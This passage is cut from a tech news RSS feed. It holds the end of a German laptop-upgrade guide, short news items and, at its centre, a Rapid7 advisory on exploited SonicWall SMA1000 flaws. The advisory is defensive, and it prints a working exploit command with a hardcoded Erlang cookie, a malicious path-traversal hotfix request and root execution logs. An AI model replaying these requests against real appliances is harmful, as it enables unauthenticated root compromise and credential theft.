<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a589724c4c4a"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/image_3209eb.png?w=1200" alt="Cooler master DDR5 RAM with active cooling" class="wp-image-3153332" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Cooler Master</p></div>



<p>Für knappe Budgets bleibt die SATA-SSD die günstige Alternative. Sie liegt mit maximal rund 550 Megabyte pro Sekunde unter dem NVMe-Tempo, kostet aber merklich weniger und genügt für Surfen, Streaming und ältere Programme vollauf. Bei akutem Bedarf vergleichen Sie die Preise tagesaktuell. Vom Kauf auf Vorrat raten wir ab.</p>



<h2 class="wp-block-heading toc">Der Einbau gelingt mit wenig Werkzeug</h2>



<p>Der Einbau verlangt kein Spezialwissen. Zuerst identifizieren Sie das Gerät über die Modellnummer am Geräteboden und gleichen die Aufrüstgrenzen mit dem Datenblatt des Herstellers ab, bei Lenovo zum Beispiel über das PSREF. Als Werkzeug genügen ein kleiner Kreuzschlitz-Schraubendreher, ein Plastikspudger und <a href="https://www.amazon.de/iFixit-Antistatisches-Armband-ESD-Schutzerdung-Krokodilklemme/dp/B00B2T9C8Y?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">ein Antistatik-Armband für rund 10 Euro</a>.</p>



<p>Sinnvoll ist eine feste Reihenfolge. Windows vollständig herunterfahren -&gt; Netzteil und USB-Geräte abziehen -&gt; an einer unlackierten Metallfläche entladen -&gt; Bodenplatte lösen -&gt; internen Akkustecker abklemmen -&gt; SSD oder RAM tauschen -&gt; kurz testen -&gt; verschrauben. Die Schrauben der Bodenplatte haben oft unterschiedliche Längen, eine Schale mit Positionsnotiz beugt Verwechslungen vor. Module fassen Sie nur an den Kanten, niemals an den goldenen Kontakten.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a589724c5777"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Surface-Laptop-8-for-Business-keyboard.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Surface Laptop 8 for Business keyboard" class="wp-image-3161239" width="1200" height="900" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>Ein Stolperstein verdient Beachtung. Nach einem Hardware-Eingriff verlangt Windows beim Start <a href="https://www.pcwelt.de/article/2513438/gerateverschluesselung-bitlocker-windows-11-24h2-home-so-gehts.html" target="_blank" rel="noreferrer noopener">häufig den BitLocker-Wiederherstellungsschlüssel</a>. Sichern Sie diesen vorab über Ihr Microsoft-Konto, sonst sperrt sich das System aus. Für den Umzug des Betriebssystems stecken Sie die neue SSD <a href="https://www.amazon.de/FIDECO-Sandwich-Design-Werkzeuglose-Installation-Unterst%C3%BCtzung-Schwarz/dp/B0CYLDM23M?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">über einen USB-SATA- oder USB-NVMe-Adapter für rund 15 Euro an</a> und klonen den Datenträger mit einem kostenlosen Tool, zum Beispiel <a href="https://www.pcwelt.de/article/1686627/aomei-backupper.html" target="_blank" rel="noreferrer noopener">AOMEI Backupper</a> oder der älteren Gratis-Version von <a href="https://www.pcwelt.de/article/1148689/backup-software-macrium-reflect.html" target="_blank" rel="noreferrer noopener">Macrium Reflect</a>. Die vollständige Neuinstallation über einen USB-Stick bleibt die gründlichere Variante. Für Hersteller-SSDs eignen sich Samsung Magician oder die Acronis-Editionen von Crucial, WD und Kingston.</p>



<h2 class="wp-block-heading toc">Akkutausch und Reinigung bei offenem Gehäuse</h2>



<p>Ist das Gehäuse offen, bietet sich weitere Pflege an. Der Akku ist ein Verschleißteil und verliert über die Jahre Kapazität. Ein Austausch bringt die Laufzeit zurück. Original-Akkus passen sicher, geprüfte Drittanbieter mit CE- und TÜV-GS-Kennzeichnung kosten weniger. Moderne Lithium-Ionen-Akkus brauchen keine vollständigen Entladezyklen mehr. Tiefentladung schadet eher, und viele Hersteller bieten ein Ladelimit von 80 Prozent zur Schonung.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a589724c610b"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/PC-zu-langsam-PC-Entstauben.jpg?quality=50&amp;strip=all" alt="PC zu langsam PC Entstauben" class="wp-image-3082889" width="1024" height="1024" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Friedrich Stiemer</p></div>



<p>Staub setzt sich über die Jahre im Lüfter und an den Kühlrippen ab und drosselt die Kühlung. Bei geöffnetem Gerät <a href="https://www.amazon.de/750ml-Spraytive-Druckluftspray-Druckluftreiniger-Spr%C3%BChverl%C3%A4ngerung/dp/B083Y35G8H?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">entfernen Sie ihn vorsichtig mit Druckluft</a> oder <a href="https://www.amazon.de/Reinigungsset-Antistatische-Tastatur-Reinigungspinsel-Reinigungs/dp/B0FDGCB96J?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">einem weichen Pinsel</a>, ohne den Lüfter frei drehen zu lassen. Ist die <a href="https://www.amazon.de/Thermal-Grizzly-TG-K-001-RS-Kryonaut-W%C3%A4rmeleitpaste/dp/B011F7W3LU?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Wärmeleitpaste auf dem Prozessor ausgehärtet, senkt ein Erneuern die Temperaturen merklich</a>. Das Resultat sind ein leiserer Lüfter und stabilere Taktraten unter Last.</p>



<h2 class="wp-block-heading toc">Fazit</h2>



<p>Den größten Gewinn bringt der Tausch auf eine NVMe-SSD, gefolgt von mehr Arbeitsspeicher. Beides ist mit etwas Geschick in einer Stunde eingebaut und verlängert die Nutzungsdauer eines vier Jahre alten Notebooks deutlich. Die hohen Speicherpreise des Jahres 2026 verschieben die Rechnung, kippen sie aber, denn eine SATA-SSD und ein passender RAM-Riegel bleiben günstiger als ein Neugerät. Bei verlötetem Speicher, ausgereizter Mainboard-Grenze oder zu schwacher CPU ist der Neukauf die bessere Wahl.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Even HP resellers thought the price of toner and ink was too high – so HP India facilitated an illegal cartel]]></title>
<description><![CDATA[Regulator fines PC and printer giant for rigged tender bids and collusion]]></description>
<link>https://tsecurity.de/de/3672407/it-nachrichten/even-hp-resellers-thought-the-price-of-toner-and-ink-was-too-high-so-hp-india-facilitated-an-illegal-cartel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672407/it-nachrichten/even-hp-resellers-thought-the-price-of-toner-and-ink-was-too-high-so-hp-india-facilitated-an-illegal-cartel/</guid>
<pubDate>Thu, 16 Jul 2026 07:18:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Regulator fines PC and printer giant for rigged tender bids and collusion]]></content:encoded>
</item>
<item>
<title><![CDATA[VirtualBox Bridged Adapter cannot ping host]]></title>
<description><![CDATA[If your VirtualBox virtual machine can access the network but cannot ping the Windows 11 host while using the Bridged Adapter network mode, the problem is usually related to Windows networking, firewall rules, or VirtualBox network settings. In this post, we will see what to do if VirtualBox Brid...]]></description>
<link>https://tsecurity.de/de/3672144/windows-tipps/virtualbox-bridged-adapter-cannot-ping-host/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672144/windows-tipps/virtualbox-bridged-adapter-cannot-ping-host/</guid>
<pubDate>Thu, 16 Jul 2026 03:10:41 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="700" height="369" src="https://www.thewindowsclub.com/wp-content/uploads/2026/06/enable-file-and-printer-sharing.jpg" class="attachment-full size-full wp-post-image" alt="VirtualBox Bridged Adapter cannot ping host" decoding="async" fetchpriority="high" srcset="https://www.thewindowsclub.com/wp-content/uploads/2026/06/enable-file-and-printer-sharing.jpg 700w, https://www.thewindowsclub.com/wp-content/uploads/2026/06/enable-file-and-printer-sharing-500x264.jpg 500w, https://www.thewindowsclub.com/wp-content/uploads/2026/06/enable-file-and-printer-sharing-300x158.jpg 300w" sizes="(max-width: 700px) 100vw, 700px">If your VirtualBox virtual machine can access the network but cannot ping the Windows 11 host while using the Bridged Adapter network mode, the problem is usually related to Windows networking, firewall rules, or VirtualBox network settings. In this post, we will see what to do if VirtualBox Bridged Adapter cannot ping the host. This […]</p>
<p>This article <a href="https://www.thewindowsclub.com/virtualbox-bridged-adapter-cannot-ping-host">VirtualBox Bridged Adapter cannot ping host</a> first appeared on <a href="https://www.thewindowsclub.com/">TheWindowsClub.com</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I 3D Print Over 10 Pounds of Material Every Week -- These Are the Filaments I Recommend]]></title>
<description><![CDATA[Looking to buy 3D printer filament? Skip the confusion with our top options for all experience levels, picked by CNET's experts.]]></description>
<link>https://tsecurity.de/de/3671865/it-nachrichten/i-3d-print-over-10-pounds-of-material-every-week-these-are-the-filaments-i-recommend/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671865/it-nachrichten/i-3d-print-over-10-pounds-of-material-every-week-these-are-the-filaments-i-recommend/</guid>
<pubDate>Wed, 15 Jul 2026 23:01:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Looking to buy 3D printer filament? Skip the confusion with our top options for all experience levels, picked by CNET's experts.]]></content:encoded>
</item>
<item>
<title><![CDATA[Rapid7 MDR Team Discovers New SonicWall SMA1000 Zero Days being Actively Exploited (CVE-2026-15409, CVE-2026-15410)]]></title>
<description><![CDATA[OverviewOn July 14, 2026, SonicWall published a security advisory addressing two vulnerabilities affecting SMA1000 Series remote access appliances, including the critical server-side request forgery (SSRF) vulnerability CVE-2026-15409 (CVSS 10.0) and the high-severity code injection vulnerability...]]></description>
<link>https://tsecurity.de/de/3671466/it-security-nachrichten/rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671466/it-security-nachrichten/rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410/</guid>
<pubDate>Wed, 15 Jul 2026 19:24:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Overview</h2><p><span>On July 14, 2026, SonicWall </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008" target="_blank"><span>published</span></a><span> a security advisory addressing two vulnerabilities affecting SMA1000 Series remote access appliances, including the critical server-side request forgery (SSRF) vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-15409" target="_blank"><span>CVE-2026-15409</span></a><span> (CVSS 10.0) and the high-severity code injection vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-15410" target="_blank"><span>CVE-2026-15410</span></a><span>. The advisory urges customers to immediately apply the latest platform hotfix releases.</span></p><p><span>Successful exploitation of CVE-2026-15409 permits an unauthenticated attacker to open a websocket-based tunnel to arbitrary localhost-only services, while CVE-2026-15410 is a local privilege escalation that permits an attacker with access to an internal service listening on port 8188 on localhost to execute arbitrary operating system commands as root via a malicious path traversal-based </span><span><span data-type="inlineCode">remove_hotfix</span></span><span> workflow.</span></p><p><span>Both vulnerabilities are being actively exploited in the wild. Prior to SonicWall’s official vulnerability disclosure, Rapid7’s Managed Detection and Response team observed active, targeted zero-day exploitation of internet-facing SMA 1000-series appliances. In the SonicWall advisory, exploitation in the wild was </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008#EITW" target="_blank"><span>noted</span></a><span>, and both </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15409" target="_blank"><span>CVE-2026-15409</span></a><span> and </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15410" target="_blank"><span>CVE-2026-15410</span></a><span> have been added to CISA's Known Exploited Vulnerabilities (</span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" target="_blank"><span>KEV</span></a><span>) catalog. Given the confirmed exploitation activity and the critical unauthenticated impact of the vulnerabilities, organizations should prioritize remediation of SMA1000 appliances on an emergency basis. A Python proof-of-concept for CVE-2026-15409 is available </span><a href="https://github.com/remmons-r7/rapid7-CVE-2026-15409"><span>here</span></a><span> for exposure validation, and a Metasploit module for the chain is in development.</span></p><p><span>Affected products include SonicWall SMA1000 Series models 6210, 7210, and 8200v running:</span></p><ul><li><p><span>12.4.3-03245</span></p></li><li><p><span>12.4.3-03387</span></p></li><li><p><span>12.4.3-03434 (platform-hotfix)</span></p></li><li><p><span>12.5.0-02283</span></p></li><li><p><span>12.5.0-02624</span></p></li><li><p><span>12.5.0-02800 (platform-hotfix)</span></p></li></ul><p><span>These vulnerabilities do not affect SSL VPN functionality on SonicWall firewalls or the SMA 100 Series product line.</span></p><h2>Technical overview</h2><p><span>The primary vulnerability is in a websocket proxy feature, accessed via the path /wsproxy on the affected “SonicWall WorkPlace” application (served on port 443 by default). This feature permits a netcat-like TCP tunnel to arbitrary hosts and ports, which are provided by the user in URL parameters. By providing host values that point to localhost, the attacker can access local SonicWall appliance system services behind the firewall to send and receive arbitrary TCP traffic to and from them. This is the first-stage vulnerability, CVE-2026-15409, that Rapid7 MDR analysts are seeing attackers exploiting in the wild. With this capability, an attacker can reach and exploit less-hardened services running on the appliance, such as the Erlang application on localhost:1050 or the ctrl-service application on localhost:8188. </span></p><p><span>We developed an exploit targeting the Erlang process listening on localhost:1050 for remote code execution. Note that the provided cookie value is hardcoded for the Erlang process, based on our testing, so authentication is not required to establish code execution.</span></p><pre language="html"># python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&amp;serviceType=SSH&amp;host=0.0.0.0&amp;port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'whoami &amp;&amp; id &amp;&amp; pwd &amp;&amp; hostname'
Authenticated to couchdb@127.0.0.1
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 =&gt; couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma</pre><p><span></span></p><p><span>With code execution established, the attacker can escalate to root on the appliance by exploiting CVE-2026-15410, which is a path traversal in the remove_hotfix workflow of ctrl-service. This can be performed via the web console or by hitting port 8188 on the device. The attacker provides a hotfix value containing a path traversal sequence to a malicious script, such as “../../../../var/tmp/privesc”. The system executes the script as root and (typically) reboots the appliance immediately after.</span><br><span>An example malicious request achieving privilege escalation by leveraging this from the web panel is depicted below:</span></p><pre language="html">POST /rollbackConfirm.action HTTP/1.1
Host: 192.168.181.46:8443
Cookie: EXTRAWEB_REFERER=%252F; JSESSIONID=node01bcg1tbiy6qi7s97xsoa42lhp8.node0
Content-Length: 134
Cache-Control: max-age=0
Sec-Ch-Ua: "Not?A_Brand";v="24", "Chromium";v="152"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/152.0.0.0 Safari/537.36
Origin: https://192.168.181.46:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.181.46:8443/rollbackConfirm.action
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

csrfToken=GFEJUCQBUZOLUCCOO3YBA8G30ZE9VKDP&amp;command=rollback&amp;rollbackUpgradeTime=&amp;hotfix=../../../../../tmp/1234.sh&amp;rollbackHotfixTime=</pre><p><span></span></p><p><span>If the provided hotfix file does not exist, a reboot does not occur. If the provided file exists, the system reboots after it chmods and executes the file. Below is a system monitor (pspy) depicting output of this occurring during exploitation:</span></p><pre language="html">2026/07/09 23:21:00 CMD: UID=0     PID=10355  | chmod +x /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh
2026/07/09 23:21:00 CMD: UID=0     PID=10355  | /bin/bash /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh --unattended
2026/07/09 23:21:00 CMD: UID=0     PID=10361  | /usr/bin/python3 /usr/local/ctrl-service/bin/ctrl-service.py
[...]
2026/07/09 23:21:22 CMD: UID=0     PID=11124  | shutdown -r now</pre><p><span></span></p><p><span>A Python proof-of-concept for CVE-2026-15409 is available </span><a href="https://github.com/remmons-r7/rapid7-CVE-2026-15409" target="_blank"><span>here</span></a><span>; a Metasploit module for the chain is in development.</span></p><h2>Mitigation guidance</h2><p><span>Organizations operating SonicWall SMA1000 appliances should </span><span><strong>immediately upgrade</strong></span><span> to the latest platform hotfix releases.</span></p><p><span>Fixed versions are:</span></p><table><colgroup data-width="609"><col><col></colgroup><thead><tr><th><p><span>Product</span></p></th><th><p><span>Fixed Version</span></p></th></tr></thead><tbody><tr><td><p><span>SMA1000 Series (6210, 7210, 8200v)</span></p></td><td><p><span>12.4.3-03453 (platform-hotfix) or later</span></p></td></tr><tr><td><p><span>SMA1000 Series (6210, 7210, 8200v)</span></p></td><td><p><span>12.5.0-02835 (platform-hotfix) or later</span></p></td></tr></tbody></table><p><span></span></p><p><span>There are </span><span><strong>no workarounds</strong></span><span> available.</span></p><p><span>Because active exploitation has been confirmed, organizations should not rely solely on patching. SonicWall additionally recommends:</span></p><ul><li><p><span>Performing a thorough forensic review for indicators of compromise.</span></p></li><li><p><span>Re-imaging physical appliances or redeploying virtual appliances if compromise is identified.</span></p></li><li><p><span>Changing user and administrator passwords.</span></p></li><li><p><span>Resetting TOTP tokens following confirmed compromise.</span></p></li></ul><p><span>Customers should consult the SonicWall security advisory for the latest remediation guidance and platform hotfix availability.</span></p><h2>Observed exploitation</h2><p><span>Prior to SonicWall’s official vulnerability disclosure, our Managed Detection and Response team observed active, targeted exploitation of internet-facing SMA 1000-series appliances. Threat actors were primarily leveraging the perimeter appliance as a stealthy initial access vector, executing commands on the operating system by bypassing traditional input validation controls. Once they established a foothold on the appliance, the actors systematically extracted high-value credentials, active session databases, and Time-Based One-Time Password (TOTP) multi-factor authentication (MFA) seed configurations. This local harvesting was designed to ensure long-term, persistent access that could survive standard network-level remediations.</span></p><p><span>With these harvested resources, the threat actors quickly shifted to lateral movement, pivoting from the compromised appliance directly into the internal corporate network. Specifically, we observed a sequence of anomalous, VPN-less Active Directory authentications targeting core domain controllers. These authentications originated directly from the appliance’s internal IP address, using atypical, non-corporate workstation client names (such as kali or other non-inventory hostnames) under the context of the appliance’s integrated LDAP service account. This unique behavior of direct, machine-level lateral movement with no corresponding active VPN tunnel confirmed that the appliance itself had been fully compromised and was acting as an unmonitored backdoor into the corporate directory infrastructure.</span></p><h2>Artifacts or evidence sources and IOCs</h2><p><span>Rapid7 recommends reviewing appliance logs for evidence of active exploitation, including the following characteristic behaviors and specific log indicators:</span></p><h3><span>Characteristic Behaviors</span></h3><ul><li><p><span><strong>Websocket exploit IOC log patterns:</strong></span><span> extraweb_access.log entries containing the strings ("GET" AND "wsproxy" AND "=-3389" AND “ 101 “) indicate interactions with the niche affected service. If suspicious host parameter values such as “0.0.0.0”, “localhost”, or “::ffff:127.0.0.1” are present, that’s indicative of likely exploitation of CVE-2026-15409. Note that “serviceType=SSH” was used in our published materials, but options such as “serviceType=TELNET” are viable alternatives.</span></p></li><li><p><span><strong>Hotfix removal exploit IOC log patterns:</strong></span><span> The ctrl-service.log shows the hotfix-removal utility (/usr/local/bin/remove_hotfix) being invoked with traversal sequences pointing to attacker-staged shell script payloads (e.g., ../../../../../../tmp/sma1000_5c47.sh). This is indicative of successful exploitation of CVE-2026-15410.</span></p></li><li><p><span><strong>Internet-facing probing:</strong></span><span> Enumeration of the SMA portal, including repeated requests to /auth1.html, path-traversal attempts, and generic file/enumeration requests (e.g., /.env, /api/sonicos/is-sslvpn-enabled).</span></p></li><li><p><span><strong>Authentication activity:</strong></span><span> Authentication-API activity against /__api__/logon/&lt;session-id&gt;/authenticate.</span></p></li><li><p><span><strong>Sensitive path access:</strong></span><span> Access to sensitive appliance paths such as /tmp/temp.db*, consistent with theft of stored session data.</span></p></li><li><p><span><strong>AD/Service Account Compromise:</strong></span><span> NTLM logons (Windows Event ID 4624, logon type 3) into internal domain controllers sourced from the appliance's internal IP address, using attacker-controlled workstation names (e.g., kali) without a corresponding VPN session.</span></p></li></ul><ul><li><p><span><strong>extraweb_access.log:</strong></span><span> Requests to /__api__/login or /__api__/logout returning HTTP 200, and requests to /wsproxy containing suspicious host parameters returning HTTP 101.</span></p></li></ul><h3><span>Configuration artifacts</span></h3><ul><li><p><span>/var/lib/unit/conf.json containing routes for /__api__/login or /__api__/logout, which are not present in legitimate configurations.</span></p></li></ul><h3><span>Atomic Indicators</span></h3><ul><li><p><span><strong>F.N.S Holdings Limited (ASN - 206092): </strong></span><span>The threat actor(s) utilized varying IP addresses, but they belonged to the VPN hosting provider FNS Holdings Limited. Limit or block access to FNS Holdings Limited if there is no business need. For reference, the IP addresses we observed were:</span></p></li><ul><li><p><span>45.131.194.0/24</span></p></li><li><p><span>45.146.54.0/24</span></p></li><li><p><span>63.135.161.0/24</span></p></li><li><p><span>173.239.211.0/24</span></p></li><li><p><span>193.37.32[.]179</span></p></li><li><p><span>193.37.32[.]214</span></p></li><li><p><span>216.73.163[.]151</span></p></li><li><p><span>216.73.163[.]158</span></p></li></ul></ul><p><span>If any indicators of compromise are identified, organizations should treat the appliance as compromised and follow SonicWall’s recovery guidance.</span></p><h2>Rapid7 customers</h2><p><span>Organizations should prioritize identifying all internet-facing SonicWall SMA1000 appliances and determine whether affected software versions remain deployed. Given SonicWall’s and Rapid7’s confirmation of active exploitation, exposed appliances should be considered high-priority assets for remediation.</span></p><p><span>Security teams should also review available authentication, web access, and appliance management logs for the indicators published by SonicWall to determine whether follow-up incident response activities are warranted.</span></p><h3>Exposure Command, InsightVM, and Nexpose</h3><p><span>Exposure Command, InsightVM, and Nexpose customers will be able to assess exposure to </span><span><strong>CVE-2026-15409</strong></span><span> and </span><span><strong>CVE-2026-15410</strong></span><span> with authenticated vulnerability checks available in the July 15 content release.</span></p><h2>Updates</h2><p><span><strong>July 15, 2026:</strong></span><span> Initial publication.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsung shows off ‘brand new shape’ for Z Fold 8 in Spider-Man teaser]]></title>
<description><![CDATA[Samsung gave a sneak peek of the "brand new shape" for its upcoming Galaxy Z Fold 8 in a new teaser for Spider-Man: Brand New Day. The video includes a few shots of Spidey taking a foldable phone off a 3D printer and opening it book-style, but each shot is heavily obscured by lens flares. […]]]></description>
<link>https://tsecurity.de/de/3671362/it-nachrichten/samsung-shows-off-brand-new-shape-for-z-fold-8-in-spider-man-teaser/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671362/it-nachrichten/samsung-shows-off-brand-new-shape-for-z-fold-8-in-spider-man-teaser/</guid>
<pubDate>Wed, 15 Jul 2026 18:34:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Samsung gave a sneak peek of the "brand new shape" for its upcoming Galaxy Z Fold 8 in a new teaser for Spider-Man: Brand New Day. The video includes a few shots of Spidey taking a foldable phone off a 3D printer and opening it book-style, but each shot is heavily obscured by lens flares. […]]]></content:encoded>
</item>
<item>
<title><![CDATA[HP's Smart Tank 5101 all-in-one cartridge-free printer includes up to two years of free ink and it's nearly 30% off right now]]></title>
<description><![CDATA[The HP Smart Tank 5101 all-in-one printer prints, scans, and copies while keeping ink costs low with its refillable tank system.]]></description>
<link>https://tsecurity.de/de/3671358/it-nachrichten/hps-smart-tank-5101-all-in-one-cartridge-free-printer-includes-up-to-two-years-of-free-ink-and-its-nearly-30-off-right-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671358/it-nachrichten/hps-smart-tank-5101-all-in-one-cartridge-free-printer-includes-up-to-two-years-of-free-ink-and-its-nearly-30-off-right-now/</guid>
<pubDate>Wed, 15 Jul 2026 18:34:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The HP Smart Tank 5101 all-in-one printer prints, scans, and copies while keeping ink costs low with its refillable tank system.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Install an AIO CPU Cooler 🖥️ Part5: How To Build A PC For Beginners 🎮]]></title>
<description><![CDATA[Author: Shannon Morse - Bewertung: 13x - Views:52 💧 Liquid cooling sounds intimidating... but it's actually one of the easiest parts of a modern PC build! 

In this episode of my PC Build Series, I'll walk you through installing an ASUS ROG Ryujin III ARGB Extreme AIO cooler onto an AMD Ryzen 9 9...]]></description>
<link>https://tsecurity.de/de/3670825/videos/how-to-install-an-aio-cpu-cooler-part5-how-to-build-a-pc-for-beginners/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670825/videos/how-to-install-an-aio-cpu-cooler-part5-how-to-build-a-pc-for-beginners/</guid>
<pubDate>Wed, 15 Jul 2026 15:33:14 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Shannon Morse - Bewertung: 13x - Views:52 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/qJ56ryh7nPE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>💧 Liquid cooling sounds intimidating... but it's actually one of the easiest parts of a modern PC build! <br />
<br />
